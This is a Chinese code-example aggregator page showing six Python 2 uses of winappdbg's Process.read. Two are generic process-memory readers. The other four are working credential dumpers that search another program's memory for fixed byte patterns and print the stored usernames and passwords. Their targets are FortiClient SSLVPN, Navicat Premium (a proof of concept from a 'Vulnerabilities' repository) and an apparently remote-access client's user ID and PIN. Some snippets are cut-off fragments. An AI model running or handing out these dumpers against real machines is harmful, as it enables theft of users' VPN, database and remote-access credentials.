本文整理汇总了Python中winappdbg.Process.read方法的典型用法代码示例。如果您正苦于以下问题:Python Process.read方法的具体用法?Python Process.read怎么用?Python Process.read使用的例子?那么恭喜您, 这里精选的方法代码示例或许可以为您提供帮助。您也可以进一步了解该方法所在类winappdbg.Process的用法示例。
在下文中一共展示了Process.read方法的6个代码示例,这些例子默认根据受欢迎程度排序。您可以为喜欢或者感觉有用的代码点赞,您的评价将有助于系统推荐出更棒的Python代码示例。
示例1: memory_search
# 需要导入模块: from winappdbg import Process [as 别名]
# 或者: from winappdbg.Process import read [as 别名]
def memory_search( pid ):
found = []
# Instance a Process object.
process = Process( pid )
# Search for the string in the process memory.
# Looking for User ID:
userid_pattern = '([0-9]\x00){3} \x00([0-9]\x00){3} \x00([0-9]\x00){3}[^)]'
for address in process.search_regexp( userid_pattern ):
found += [address]
print 'Possible UserIDs found:'
found = [i[-1] for i in found]
for i in set(found):
print i.replace('\x00','')
found = []
# Looking for Password:
pass_pattern = '([0-9]\x00){4}\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\x07\x00\x00'
for address in process.search_regexp( pass_pattern ):
found += [process.read(address[0]-3,16)]
if found:
print '\nPassword:'
if len(found) > 1:
s = list(set([x for x in found if found.count(x) > 1]))
for i in s:
pwd = re.findall('[0-9]{4}',i.replace('\x00',''))[0]
print pwd
else:
print re.findall('[0-9]{4}',found[0].replace('\x00',''))[0]
return found示例2: main
# 需要导入模块: from winappdbg import Process [as 别名]
# 或者: from winappdbg.Process import read [as 别名]
def main():
print "Process memory reader"
print "by Mario Vilas (mvilas at gmail.com)"
print
if len(sys.argv) not in (4, 5):
script = os.path.basename(sys.argv[0])
print " %s <pid> <address> <size> [binary output file]" % script
print " %s <process.exe> <address> <size> [binary output file]" % script
return
System.request_debug_privileges()
try:
pid = HexInput.integer(sys.argv[1])
except:
s = System()
s.scan_processes()
pl = s.find_processes_by_filename(sys.argv[1])
if not pl:
print "Process not found: %s" % sys.argv[1]
return
if len(pl) > 1:
print "Multiple processes found for %s" % sys.argv[1]
for p,n in pl:
print "\t%s: %s" % (HexDump.integer(p),n)
return
pid = pl[0][0].get_pid()
try:
address = HexInput.integer(sys.argv[2])
except Exception:
print "Invalid value for address: %s" % sys.argv[2]
return
try:
size = HexInput.integer(sys.argv[3])
except Exception:
print "Invalid value for size: %s" % sys.argv[3]
return
p = Process(pid)
data = p.read(address, size)
## data = p.peek(address, size)
print "Read %d bytes from PID %d" % (len(data), pid)
if len(sys.argv) == 5:
filename = sys.argv[4]
open(filename, 'wb').write(data)
print "Written %d bytes to %s" % (len(data), filename)
else:
if win32.sizeof(win32.LPVOID) == win32.sizeof(win32.DWORD):
width = 16
else:
width = 8
print
print HexDump.hexblock(data, address, width = width)示例3: process_read
# 需要导入模块: from winappdbg import Process [as 别名]
# 或者: from winappdbg.Process import read [as 别名]
def process_read( pid, address, length ):
# Instance a Process object.
process = Process( pid )
# Read the process memory.
data = process.read( address, length )
# You can also change the process memory.
# process.write( address, "example data" )
# Return a Python string with the memory contents.
return data示例4: memory_search
# 需要导入模块: from winappdbg import Process [as 别名]
# 或者: from winappdbg.Process import read [as 别名]
def memory_search( pid, strings ):
process = Process( pid )
mem_dump = []
######
# You could also use process.search_regexp to use regular expressions,
# or process.search_text for Unicode strings,
# or process.search_hexa for raw bytes represented in hex.
######
for address in process.search_bytes( strings ):
dump = process.read(address-10,800) #Dump 810 bytes from process memory
mem_dump.append(dump)
for i in mem_dump:
if "FortiClient SSLVPN offline" in i: #print all founds results by offsets to the screen.
print "\n"
print " [+] Address and port to connect: " + str(i[136:180])
print " [+] UserName: " + str(i[677:685])
print " [+] Password: " + str(i[705:715])
print "\n"示例5: Debug
# 需要导入模块: from winappdbg import Process [as 别名]
# 或者: from winappdbg.Process import read [as 别名]
debug = Debug()
try:
print "[~] Searching for pid by process name '%s'.." % (filename)
time.sleep(1)
debug.system.scan_processes()
for (process, process_name) in debug.system.find_processes_by_filename(filename):
process_pid = process.get_pid()
if process_pid is not 0:
print "[+] Found process with pid #%d" % (process_pid)
time.sleep(1)
print "[~] Trying to read memory for pid #%d" % (process_pid)
process = Process(process_pid)
for address in process.search_bytes('\x00\x90\x18\x00\x00\x00\x00\x00\x00\x00'):
memory_dump.append(process.read(address,30))
memory_dump.pop(0)
for i in range(len(memory_dump)):
str = b2h(memory_dump[i])
first = str.split("00 90 18 00 00 00 00 00 00 00 ")[1]
last = first.split("00 ")
if last[0]:
count = count+1
found = 1
print "[+] Password for connection #%d found as %s" % (count, h2b(last[0]))
if found == 0:
print "[-] Password not found! Make sure the client is connected at least to one database."
else:
print "[-] No process found with name '%s'." % (filename)
debug.loop()开发者ID:yakir-wizman,项目名称:Vulnerabilities,代码行数:32,代码来源:Navicat+Premium+11.2.11+(64bit)+Local+Password+Disclosure.py
示例6: Process
# 需要导入模块: from winappdbg import Process [as 别名]
# 或者: from winappdbg.Process import read [as 别名]
print "#\t\tTested on Windows Windows 7 64bit, English\t\t#"
print "#\t\t\tPlease use responsibly.\t\t\t\t#"
print "#########################################################################\r\n"
print "[~] Searching for pid by process name '%s'.." % (filename)
time.sleep(1)
debug.system.scan_processes()
for (process, process_name) in debug.system.find_processes_by_filename(filename):
process_pid = process.get_pid()
if process_pid is not 0:
print "[+] Found process with pid #%d" % (process_pid)
time.sleep(1)
print "[~] Trying to read memory for pid #%d" % (process_pid)
process = Process(process_pid)
for address in process.search_bytes('\x88\x38\xB7\xAE\x73\x8C\x07\x00\x0A\x16'):
memory_dump.append(process.read(address,50))
try:
str = b2h(memory_dump[0]).split('88 38 B7 AE 73 8C 07 00 0A 16')[1]
usr = h2b(str.split(' 00')[0])
except:
pass
memory_dump = []
for address in process.search_bytes('\x65\x00\x88\x38\xB7\xAE\x73\x8C\x07\x00\x02\x09'):
memory_dump.append(process.read(address,60))
try:
str = b2h(memory_dump[0]).split('07 00 02 09')[1]
pwd = h2b(str.split(' 00')[0])
except:
pass